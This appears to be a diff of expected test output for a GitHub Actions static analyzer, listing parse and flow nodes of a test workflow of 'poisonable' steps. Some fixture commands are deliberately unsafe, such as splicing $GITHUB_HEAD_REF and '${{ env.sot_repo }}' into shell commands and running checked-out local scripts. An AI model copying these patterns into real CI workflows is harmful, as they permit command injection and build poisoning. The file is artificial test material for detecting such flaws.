Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | -| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | -| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | @@ -870,11 +879,11 @@ cfgNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:1:1:41:23 | enter on: push | -| .github/workflows/poisonable_steps.yml:1:1:41:23 | exit on: push | -| .github/workflows/poisonable_steps.yml:1:1:41:23 | exit on: push (normal) | -| .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | enter on: push | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | exit on: push | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | exit on: push (normal) | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | @@ -935,8 +944,11 @@ cfgNodes | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | @@ -1047,7 +1059,7 @@ dfNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | @@ -1108,8 +1120,11 @@ dfNodes | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | @@ -1222,7 +1237,7 @@ nodeLocations | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | -| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:41:23 | .github/workflows/poisonable_steps.yml@5:5:41:23 | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:46:111 | .github/workflows/poisonable_steps.yml@5:5:46:111 | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:8:9:13:6 | .github/workflows/poisonable_steps.yml@8:9:13:6 | @@ -1283,8 +1298,11 @@ nodeLocations | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:14:39:55 | .github/workflows/poisonable_steps.yml@39:14:39:55 | | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:9:41:6 | .github/workflows/poisonable_steps.yml@40:9:41:6 | | 